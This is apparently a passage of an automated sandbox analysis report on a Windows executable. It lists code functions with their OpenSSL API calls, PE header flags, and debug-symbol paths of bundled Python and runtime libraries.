        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241EE2 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF241EE2
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254930 CRYPTO_get_ex_new_index,1_2_00007FFDFF254930
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E920 CRYPTO_free,1_2_00007FFDFF28E920
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E781 CRYPTO_free,CRYPTO_free,1_2_00007FFDFF28E781
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F28 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF241F28
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241401
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F3C CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF241F3C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2425F4 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,1_2_00007FFDFF2425F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241CA3 CRYPTO_strdup,CRYPTO_free,1_2_00007FFDFF241CA3
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242423 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF242423
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,1_2_00007FFDFF24162C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF284660 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF284660
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25A6D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFF25A6D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2826B0 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,1_2_00007FFDFF2826B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24120D EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,1_2_00007FFDFF24120D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24103C CRYPTO_malloc,COMP_expand_block,1_2_00007FFDFF24103C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E700 CRYPTO_free,1_2_00007FFDFF28E700
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2416A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2416A4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF241488
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2485A0 CRYPTO_zalloc,CRYPTO_free,1_2_00007FFDFF2485A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2605E0 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFF2605E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241212 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFF241212
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2413D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,1_2_00007FFDFF2413D9
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A6650 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF2A6650
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2424CD CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFDFF2424CD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF298620 CRYPTO_memcmp,1_2_00007FFDFF298620
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF274490 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF274490
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2418B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2418B6
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF241AC3
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2426E4 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,1_2_00007FFDFF2426E4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241ACD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B6550 CRYPTO_memcmp,1_2_00007FFDFF2B6550
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254530 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,1_2_00007FFDFF254530
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF298390 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF298390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF252360 CRYPTO_THREAD_run_once,1_2_00007FFDFF252360
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2AA3D0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2AA3D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A43C0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,1_2_00007FFDFF2A43C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241D93 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFF241D93
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF262410 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,1_2_00007FFDFF262410
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2423DD EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF2423DD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24198D CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF24198D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25E427 CRYPTO_THREAD_write_lock,1_2_00007FFDFF25E427
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244300 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF244300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241B31
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A0330 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFF2A0330
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E190 CRYPTO_free,1_2_00007FFDFF28E190
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241F55 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF241F55
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2415E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,memcpy,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2415E6
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E200 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF28E200
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241389 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF241389
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242527 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF242527
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25C080 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF25C080
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2980C0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2980C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24E0AD ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,1_2_00007FFDFF24E0AD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2620A0 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,1_2_00007FFDFF2620A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A00A0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF2A00A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244100 CRYPTO_free,1_2_00007FFDFF244100
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFF241361
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2419DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF2419DD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26E124 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,CRYPTO_set_ex_data,CRYPTO_set_ex_data,CRYPTO_get_ex_data,1_2_00007FFDFF26E124
        Source: DChOtFdp9T.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687914565.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688219519.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685472622.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
        Source: Binary string: ucrtbase.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686106421.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685252137.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion 
failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687144003.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687689879.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688330642.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB0A2000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685805435.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687322472.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686910903.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687577629.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DChOtFdp9T.exe, 00000001.00000002.1881450400.00007FFE132B1000.00000002.00000001.01000000.00000008.sdmp, _ctypes.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879602509.00007FFE101D7000.00000002.00000001.01000000.00000018.sdmp, _hashlib.pyd.0.dr
        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685320693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686476688.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684844639.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685398039.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879894522.00007FFE10308000.00000002.00000001.01000000.00000015.sdmp, _asyncio.pyd.0.dr
        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687464798.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: DChOtFdp9T.exe, 00000001.00000002.1879766821.00007FFE10252000.00000002.00000001.01000000.00000017.sdmp, pyexpat.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881200286.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686660312.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
        Source: Binary string: ucrtbase.pdbUGP source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
